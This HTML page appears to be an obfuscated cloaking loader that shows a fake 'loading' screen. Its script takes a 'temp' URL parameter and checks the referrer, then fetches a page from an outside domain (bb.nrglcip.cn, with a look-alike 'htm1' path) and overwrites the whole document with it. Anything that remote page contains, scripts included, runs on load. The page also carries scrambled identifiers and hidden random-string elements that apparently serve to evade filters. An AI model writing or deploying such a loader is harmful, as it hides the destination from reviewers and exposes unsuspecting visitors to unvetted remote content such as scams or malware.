<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qapYy9JZ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qapYy9JZ .RgP9wT6u6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qapYy9JZ .content {
            line-height: 50px;
            text-align: center
        }

        .qapYy9JZ .img {
            width: 100%
        }

        .qapYy9JZ .ZKc6UvJlI {
            text-align: center
        }

        .qapYy9JZ .ZKc6UvJlI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qapYy9JZ .ZKc6UvJlI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qapYy9JZ .ZKc6UvJlI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qapYy9JZ .ZKc6UvJlI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qapYy9JZ .ZKc6UvJlI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qapYy9JZ .ZKc6UvJlI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qapYy9JZ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function j1usk1xtXUw9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oLMiZU = j1usk1xtXUw9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oLMiZU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oLMiZU +".html?a=share";
		}
		
        F2b2Mo=url+"#"+new Date().getTime();
        F2b2Mo && function() {
            $.get(F2b2Mo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>M6ufIwn3MgmraxGYWVhYK6rH1khdGtTMyhlN7OkN5XXw1oMSDyjzgbwYBxG7qTIsq8uYcOLkp</span>
<div style='display:none'>syxaNsp0h03eJ9YgvaNWjRe1IhS5L0BAKKdtITu2jUecWT2IVPNJx9oL1APPTHGo5NruarOuLCPPQUjRxoUDSoxemKIF2aR</div>
<p  style='display:none'>u097V9vxfZgLDi1Z2kr6qjDgBamKoamtXPstSoXHTgF9B1HoLF0LIZ1bChSLJgYUHQuEU2DcI2rtIbNzAjYtjHR04Z</p>
<div style='display:none'>syxaNsp0h03eJ9YgvaNWjRe1IhS5L0BAKKdtITu2jUecWT2IVPNJx9oL1APPTHGo5NruarOuLCPPQUjRxoUDSoxemKIF2aR</div><div class="qapYy9JZ">
    <div class="RgP9wT6u6">
        <div class="ZKc6UvJlI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >Te5EdONwarol4kEAnqEFJZyKlAwPfQ97FALyt1y7mg7hrDG3fwAFwx3JZqR18Cqf</b>
<div style='display:none'>QNdIfgmpn38nZkcg1OpXfcIXc7dEPEStNLhMkZtVGEO7gd7Hssrc7gO9EUi0b</div>
<a  href='#' style='display:none'>BoumPgyKbUQtynSpNq</a>
<p  style='display:none'>FsxSM2beqmYK2eOrA73xDQnHiCovjnOOi8SpIuD75wKH</p>
<b style='display:none' >Te5EdONwarol4kEAnqEFJZyKlAwPfQ97FALyt1y7mg7hrDG3fwAFwx3JZqR18Cqf</b>
<a  href='#' style='display:none'>BoumPgyKbUQtynSpNq</a>
<h1 style='display:none' >AJrHGI4FPoifQDO0vWkZeOvLgf7e7yL2PEz61K9gJxml7BzBBVXDWv2QwJZ5FW</h1>
<ul style='display:none' >IJPShJPEt1tPwZjSajQLtcGKbJevETiWWO5nh3Gp7ogRxXU9jT7HR57jXfzggckgp8vkTpPhNbJEUPjVKJ3HrF8dF2mfAE2m</ul>
<ul style='display:none' >IJPShJPEt1tPwZjSajQLtcGKbJevETiWWO5nh3Gp7ogRxXU9jT7HR57jXfzggckgp8vkTpPhNbJEUPjVKJ3HrF8dF2mfAE2m</ul>
<li style='display:none' >SLHslASpd5ZoJ7wgRfw6zLP1qEb97MMLLCCwaXyDIUImSJRxCOmburV2XpwaFmm6TBwJNCOWxb9aQj3cdLDrQyN9PH2ilafJk</li></body>
</html>